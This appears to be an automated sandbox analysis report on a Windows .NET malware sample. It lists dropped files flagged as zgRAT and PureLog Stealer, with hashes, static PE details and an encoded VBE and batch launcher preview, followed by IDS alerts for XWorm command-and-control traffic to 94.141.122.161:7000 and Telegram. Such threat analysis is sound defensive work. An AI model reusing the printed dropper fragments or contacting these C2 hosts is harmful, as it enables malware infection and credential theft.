                                                                                            Preview:pYXPKWsQAY65VELeDNkUbOwETAja7HZdkTzi4n06VBpBg1sXZMYGy3KamS5KwRS39cUCOmjaWn9ZjvhcSLBvsSprIY6lrqJDtwBEhpIwm8uK4u11vc2lQhKqxn30q7sqe5qxtd5mDOIuiewYhE0PyiwLmVR3wSGpPEq9EDHRhPiCYZIS0fSlHd15IeLYLBzuIdeeyxUd7iriAuxMN9DR9ehwMv0j2tGfZx454oeDLyoivT5Yr8KM8iuo5rRD6ulNcMIMz1Rjf9FLz9B2zc14i3h1DQANWbGaNbFiLti0rlr8cjy5pYNe3roioRJj1EMD3p7Y3drG3BM7MiYdbEh7Nmhgwg43k88mYnFxlaBMrHk1erWF3pIwhP0RHblXixg5Ckiidk2ADUQGBpCFKyA40MFJwxpKzon3lpy4JxmSwHtM9uPbYgMuxlEzeYvp4sLYqWeV0I5WMsItd2KCiNvTb3GAk9ZuB6XE5UgmP3kQk0iFdVWlNtHr626xQev1sKUPUDxIWhxomeslUAgPmygSyqHDXtWuItiZfSuZhNPq5dEcJVcP7fP4oCbo5uunLDf35TFBPGrYi0WUmp3BQGwndovd1Gewcle28Kg0Q

                                                                                            C:\agentwebreviewDhcp\WmiPrvSE.exe

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\agentwebreviewDhcp\WmiPrvSE.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\agentwebreviewDhcp\WmiPrvSE.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................X$.........Nw$.. ....$...@.. ........................$...........@..................................w$.K.....$. .....................$...................................................... ............... ..H............text...TW$.. ...X$................. ..`.rsrc... .....$......Z$.............@....reloc........$......^$.............@..B................0w$.....H........... ...................vv$......................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{r...:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............l.......\.......8....r...ps....z*~....(\... .... .... ....s....~....(`....... ....~....{z...:....& ....8.......... ....8w...~....9.... ....~....{....:Y...& ....8N...8v... ....8?.......~....(d...~....(h... ....?J..

                                                                                            C:\agentwebreviewDhcp\fSi1yDkwZTtB7t90YnI.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):100
                                                                                            Entropy (8bit):5.153919005177815
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:a1Aj31g9qF+mP3LEJGoLgBZWFiAzGUO3:a1Ajqq/PAXcmzGx3
                                                                                            MD5:DBF2C6D812BEF8A05E965EE3959CF06F
                                                                                            SHA1:F0A022CCB62A657EF4569B4C06E38D72AC63004C
                                                                                            SHA-256:AA392A9FDDA6521EB12BDBC2E78F61190C4C28CC9BA7FA1F1857D5197D24BBAB
                                                                                            SHA-512:A5F7FD96AE62D6632B098C2A68D1528A23B3C3D6B1374124A3766C3B6470B94684A5BFB4034752DC18CAD64FF49EF4BB1D488B29E4FC1EFB997620E98FAEB720
                                                                                            Malicious:false
                                                                                            Preview:%LiqnMAhGsvM%%LhRQtxuRQYo%..%jSGTvqCvfAihqUT%"C:\agentwebreviewDhcp/portBrowserweb.exe"%VcswqNSLrPY%

                                                                                            C:\agentwebreviewDhcp\portBrowserweb.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\agentwebreviewDhcp\portBrowserweb.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................X$.........Nw$.. ....$...@.. ........................$...........@..................................w$.K.....$. .....................$...................................................... ............... ..H............text...TW$.. ...X$................. ..`.rsrc... .....$......Z$.............@....reloc........$......^$.............@..B................0w$.....H........... ...................vv$......................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{r...:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............l.......\.......8....r...ps....z*~....(\... .... .... ....s....~....(`....... ....~....{z...:....& ....8.......... ....8w...~....9.... ....~....{....:Y...& ....8N...8v... ....8?.......~....(d...~....(h... ....?J..

                                                                                            C:\agentwebreviewDhcp\uk12ZF.vbe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):216
                                                                                            Entropy (8bit):5.775879505078954
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:GVwqK+NkLzWbHnrFnBaORbM5nCa32gWfPEIJqvgFYWs:G4MCzWLnhBaORbQCMgEj0u
                                                                                            MD5:2F093CD779A9164BA67AFC2EC042C087
                                                                                            SHA1:B8E1F4E14C2D51F0D6B8EEA66EBE3AA16736E278
                                                                                            SHA-256:60A9CE888E47061C3F2479A53AD466DCACBD1B8B52DA1FB365D49E2A1319E0F1
                                                                                            SHA-512:D4321E29043FDDC0FEE19CD3A0E59A3F4DBF53477129FFF4FA180DD90731EDE6EDC851ECA8E09190C2A2C31B326C31D45FA4C3B6CB4F154146D7B73A1A552F01
                                                                                            Malicious:false
                                                                                            Preview:#@~^vwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v f!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zCT+.Yh.4Mn\b+Af4m2&J0?bqXG3h\POAFYO!ex( (lOJB~!BPWC^/+0zwAAA==^#~@.

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Entropy (8bit):5.978638570641455
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            File name:HaLCYOFjMN.exe
                                                                                            File size:75'264 bytes
                                                                                            MD5:3c30d3b3706b97a2a0638180bb159b44
                                                                                            SHA1:eeb4a51ebfac2ba3a159f2b9ee1a4b1caef3b960
                                                                                            SHA256:7464ba97e34f2e95995d4a7a77e39409e57101d7ee156abf42f0b08deb192aa7
                                                                                            SHA512:9784d33f85f88e275571904284661085290a7a31344454b7f80d4aca9cb76a7cb8acabe4f21ee6917c51553b22393eb268dc02448dfda013f362c42fb74d1dda
                                                                                            SSDEEP:1536:D1He2dkYfPIVozC+ObXw3GFF64iOf+Iilu8wwP:FpTYbXBFCOf+Iiludi
                                                                                            TLSH:20737C2877E14525E5FFAFF51AF13212CB39E3639903D20F28CA028A1B17A88CD517E5
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>.yg............................n:... ...@....@.. ....................................@................................

                                                                                            File Icon

                                                                                            Icon Hash:00928e8e8686b000

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x413a6e
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x6779A13E [Sat Jan 4 20:59:42 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            jmp dword ptr [00402000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13a140x57.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x4ce.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x160000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x20000x11a740x11c000215dccb02ff1b9ce49a0fd4f29aa8b3False0.5957306338028169data6.05122540072875IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0x140000x4ce0x60015075c229f5bff770511731196b85f0bFalse0.3736979166666667data3.715870269791872IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x160000xc0x200baa7b2f29b759635ad3510e883d642f7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0x140a00x244data0.4706896551724138
                                                                                            RT_MANIFEST0x142e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                            Imports

                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-07T18:03:14.080824+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749975149.154.167.220443TCP
                                                                                            2025-01-07T18:03:14.080824+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.749975149.154.167.220443TCP
                                                                                            2025-01-07T18:03:28.966983+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:03:29.197267+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:03:29.198973+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:03:39.472382+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:03:39.475195+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:03:49.797368+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:03:49.809201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:03:53.951272+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:03:53.951272+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:00.128847+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:00.247862+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:04:10.590947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:10.923064+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:04:11.832339+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.74997694.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.065408+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound194.141.122.1617000192.168.2.749976TCP
                                                                                            2025-01-07T18:04:12.465955+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.465955+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.587831+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.587831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.706921+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.706921+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.819339+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.819339+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.926773+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:12.926773+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.037013+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.037013+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.174928+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.174928+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.324048+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.324048+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.460752+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.460752+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.610868+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.610868+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.740083+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.740083+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.870139+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:13.870139+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.036384+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.036384+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.175784+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.175784+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.329460+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.329460+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.448891+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.448891+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.589062+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.589062+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.772321+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:14.772321+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.014670+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.014670+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.210930+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.210930+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.372806+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.372806+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.506425+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.506425+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.699869+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.699869+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.871119+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:15.871119+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.025845+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.025845+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.165432+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.165432+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.303826+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.303826+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.451509+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.451509+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.627559+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.627559+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.745605+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.745605+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.863511+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.74998294.141.122.1617000TCP
                                                                                            2025-01-07T18:04:16.863511+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74998294.141.122.1617000TCP
